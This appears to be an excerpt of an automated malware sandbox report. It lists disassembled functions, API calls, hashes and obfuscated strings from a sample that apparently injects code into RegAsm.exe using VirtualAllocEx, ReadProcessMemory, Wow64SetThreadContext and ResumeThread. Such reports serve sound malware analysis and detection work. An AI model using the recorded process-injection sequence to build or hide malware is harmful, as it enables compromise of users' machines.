                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 1de7dd3d31505d7ed86775f9fcf806884fd02e7cafa773835aae0192d97a6a09
                                    • Instruction ID: fe20cf2ab9a9c4c2fed11ddde53db83137a75c1c65eac460748e61d488e4f9b5
                                    • Opcode Fuzzy Hash: 1de7dd3d31505d7ed86775f9fcf806884fd02e7cafa773835aae0192d97a6a09
                                    • Instruction Fuzzy Hash: 262136B59003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7240D7789944CBA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 140 2382650-23826e5 ReadProcessMemory 143 23826ee-238271e 140->143 144 23826e7-23826ed 140->144 144->143
                                    APIs
                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 023826D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 3a1fb432f414ec6b5d6f832617fbdea6182d8745b0e59d8f692f0001b2496b88
                                    • Instruction ID: 40bc66e288a67dd8f4024adb221a9a47d9e746abf74570e04c8d4073f7ea18cc
                                    • Opcode Fuzzy Hash: 3a1fb432f414ec6b5d6f832617fbdea6182d8745b0e59d8f692f0001b2496b88
                                    • Instruction Fuzzy Hash: 232107B5D003599FCB10DFA9C881AEEBBF5FF48310F508429E959A7240C7799945CBA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 148 23823c8-238241b 150 238242b-238245b Wow64SetThreadContext 148->150 151 238241d-2382429 148->151 153 238245d-2382463 150->153 154 2382464-2382494 150->154 151->150 153->154
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0238244E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: a5a5a2d93026e33484ec1a3042b9f8a51a5ed40decf7bd161d717fb323e8b009
                                    • Instruction ID: eb82561f6e3256b9fbfac9047ccaa3779c076c22a688559fbc9c99f621d5fc2b
                                    • Opcode Fuzzy Hash: a5a5a2d93026e33484ec1a3042b9f8a51a5ed40decf7bd161d717fb323e8b009
                                    • Instruction Fuzzy Hash: 322145B19003488FDB20DFAAC4857EEBBF0EF89314F148429D859A7241CB789949CFA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 168 2382658-23826e5 ReadProcessMemory 171 23826ee-238271e 168->171 172 23826e7-23826ed 168->172 172->171
                                    APIs
                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 023826D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: ac81a2c2303a490bde0cd1fa4110afbc78748d9081621fc571dc03bf8b38e91a
                                    • Instruction ID: 6ced9a10a511c13bee4736f80859f0e5fe8fa68414d85528db4caa859eb2f288
                                    • Opcode Fuzzy Hash: ac81a2c2303a490bde0cd1fa4110afbc78748d9081621fc571dc03bf8b38e91a
                                    • Instruction Fuzzy Hash: 222139B1D003499FCB10DFAAC880AEEFBF5FF48310F508429E919A7240C7789940CBA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 158 23823d0-238241b 160 238242b-238245b Wow64SetThreadContext 158->160 161 238241d-2382429 158->161 163 238245d-2382463 160->163 164 2382464-2382494 160->164 161->160 163->164
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0238244E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 39e375ae1db0dbb2e91fdfb7920b5c2191ba5b1ba0e1a7af97b86f532dfbb555
                                    • Instruction ID: 4a05e73c167e029677dbcbf6c62a0318b31a8db905892a9253161010c74d57fc
                                    • Opcode Fuzzy Hash: 39e375ae1db0dbb2e91fdfb7920b5c2191ba5b1ba0e1a7af97b86f532dfbb555
                                    • Instruction Fuzzy Hash: 792135B19003098FDB10DFAAC4857EEBBF4EF88314F10842AD919A7240CB78A945CFA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 176 23824a0-2382523 VirtualAllocEx 179 238252c-2382551 176->179 180 2382525-238252b 176->180 180->179
                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02382516
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 68049a3de7c5b4e94cd362645164c53a3612a0d0021c4aaf033b335151829c6a
                                    • Instruction ID: 72d6bb155c1c6efe840fe044dbc119f923a0af13cc57c4dd8e6df477d7a7fe97
                                    • Opcode Fuzzy Hash: 68049a3de7c5b4e94cd362645164c53a3612a0d0021c4aaf033b335151829c6a
                                    • Instruction Fuzzy Hash: DE2147719002488FCB20DFA9C444BEEBFF5EF89310F248459D959A7250C7399944CFA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 184 23824a8-2382523 VirtualAllocEx 187 238252c-2382551 184->187 188 2382525-238252b 184->188 188->187
                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02382516
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 71f556295a4d9a62b51b129c003ea87eb5fee2467e11883cfbaa92c488c6396f
                                    • Instruction ID: 4e7bcbc8893936345a343c61aeb0b09a82865c01bc9c32a0fe08c926a3fc3b34
                                    • Opcode Fuzzy Hash: 71f556295a4d9a62b51b129c003ea87eb5fee2467e11883cfbaa92c488c6396f
                                    • Instruction Fuzzy Hash: 681126759002499FCB10DFAAC844AEFFFF5EF88310F108419E919A7250C779A540CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 200 2382318-238238f ResumeThread 204 2382398-23823bd 200->204 205 2382391-2382397 200->205 205->204
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: fd189a12d74217665153f0c42ad7e9b36ff844070298fdc2324a5308d029f4dc
                                    • Instruction ID: 0bf462dea118a25059fdba0302483abbfd494054f143d91ad9a1eefb97bb42a9
                                    • Opcode Fuzzy Hash: fd189a12d74217665153f0c42ad7e9b36ff844070298fdc2324a5308d029f4dc
                                    • Instruction Fuzzy Hash: 6C1146B59003488FCB20DFAAC4457EFFBF4EF89314F208459D519AB240CB79A945CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 217 2382320-238238f ResumeThread 220 2382398-23823bd 217->220 221 2382391-2382397 217->221 221->220
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2055511945.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2380000_qoqD1RxV0F.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: eec520061b8be16f5e24b3cd4614af5c6d775a5ac64ad53f6f2a45e94dbbd25f
                                    • Instruction ID: 72c38e27758069136e8b37fffd860e7d83692fd07d848efdd08c6330d4a318f4
                                    • Opcode Fuzzy Hash: eec520061b8be16f5e24b3cd4614af5c6d775a5ac64ad53f6f2a45e94dbbd25f
                                    • Instruction Fuzzy Hash: 081125B19003498BCB24EFAAC4457AFFBF5EF89324F208419D519A7240CB79A944CBA4

                                    Execution Graph

                                    Execution Coverage:1.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:44.1%
                                    Total number of Nodes:34
                                    Total number of Limit Nodes:4
                                    execution_graph 13476 408850 13478 40885f 13476->13478 13477 408acf ExitProcess 13478->13477 13479 408ab8 13478->13479 13480 40891c GetCurrentProcessId GetCurrentThreadId 13478->13480 13489 43c160 13479->13489 13481 408941 13480->13481 13482 408945 SHGetSpecialFolderPathW GetForegroundWindow 13480->13482 13481->13482 13484 408a3d 13482->13484 13484->13479 13488 40c550 CoInitializeEx 13484->13488 13492 43d7f0 13489->13492 13491 43c165 FreeLibrary 13491->13477 13493 43d7f9 13492->13493 13493->13491 13447 40c583 CoInitializeSecurity 13453 43c767 13455 43c790 13453->13455 13454 43c80e 13455->13454 13457 43c1f0 LdrInitializeThunk 13455->13457 13457->13454 13458 43cce6 13459 43cd00 13458->13459 13461 43cd6e 13459->13461 13465 43c1f0 LdrInitializeThunk 13459->13465 13464 43c1f0 LdrInitializeThunk 13461->13464 13463 43ce4d 13464->13463 13465->13461 13466 43c58a 13468 43c460 13466->13468 13467 43c5f4 13468->13467 13471 43c1f0 LdrInitializeThunk 13468->13471 13470 43c54d 13471->13470 13499 40e71a CoUninitialize CoUninitialize 13472 43c2c8 13473 43c2e0 13472->13473 13473->13473 13474 43ccaf GetForegroundWindow 13473->13474 13475 43ccbe 13474->13475

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                    • GetCurrentThreadId.KERNEL32 ref: 00408925
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                    • GetForegroundWindow.USER32 ref: 00408A33
                                      • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                      • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                      • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                    • ExitProcess.KERNEL32 ref: 00408AD1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                    • String ID:
                                    • API String ID: 3072701918-0
                                    • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                    • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                    • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                    • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 44 43c1f0-43c222 LdrInitializeThunk
                                    APIs
                                    • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 116 43c767-43c78f 117 43c790-43c7d6 116->117 117->117 118 43c7d8-43c7e3 117->118 119 43c810-43c813 118->119 120 43c7e5-43c7f3 118->120 122 43c841-43c862 119->122 121 43c800-43c807 120->121 123 43c815-43c81b 121->123 124 43c809-43c80c 121->124 123->122 126 43c81d-43c839 call 43c1f0 123->126 124->121 125 43c80e 124->125 125->122 128 43c83e 126->128 128->122
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,+*)
                                    • API String ID: 0-3529585375
                                    • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                    • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                    • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                    • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 35 40e71a-40e738 CoUninitialize * 2
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Uninitialize
                                    • String ID:
                                    • API String ID: 3861434553-0
                                    • Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                    • Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
                                    • Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                    • Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 36 43c2c8-43c2d6 37 43c2e0-43c2fd 36->37 37->37 38 43c2ff-43ccb9 GetForegroundWindow call 43e110 37->38 41 43ccbe-43ccdf 38->41
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0043CCAF
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: ForegroundWindow
                                    • String ID:
                                    • API String ID: 2020703349-0
                                    • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                    • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                    • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                    • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 42 40c550-40c580 CoInitializeEx
                                    APIs
                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                    • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                    • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                    • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 43 40c583-40c5b2 CoInitializeSecurity
                                    APIs
                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeSecurity
                                    • String ID:
                                    • API String ID: 640775948-0
                                    • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                    • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                    • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                    • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                    • API String ID: 0-561599860
                                    • Opcode ID: d9ba1a141e1c252aa0639563dea27da91275ec820e05fdca1cc4e30b20f87440
                                    • Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
                                    • Opcode Fuzzy Hash: d9ba1a141e1c252aa0639563dea27da91275ec820e05fdca1cc4e30b20f87440
                                    • Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                    • API String ID: 0-168325148
                                    • Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                    • Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
                                    • Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                    • Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                    • API String ID: 0-3492884535
                                    • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                    • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                    • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                    • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                    APIs
                                    • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                    • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                    • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                    • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                    • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                    • VariantClear.OLEAUT32(?), ref: 004383F9
                                    • SysFreeString.OLEAUT32(?), ref: 0043841D
                                    • SysFreeString.OLEAUT32(?), ref: 00438423
                                    • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                    • String ID: P%R$)\"^$.H4J$O@$pq
                                    • API String ID: 2485776651-1397720406
                                    • Opcode ID: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
                                    • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                    • Opcode Fuzzy Hash: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
                                    • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                    • API String ID: 0-2608794092
                                    • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                    • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                    • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                    • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                    • API String ID: 0-1300133108
                                    • Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                    • Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
                                    • Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                    • Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                    • API String ID: 0-1893782281
                                    • Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                    • Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
                                    • Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                    • Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                    • API String ID: 0-1290103930
                                    • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                    • Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
                                    • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                    • Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                    • API String ID: 0-1763234448
                                    • Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                    • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                    • Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                    • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                    • API String ID: 0-1826372655
                                    • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                    • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                    • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                    • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                    APIs
                                      • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
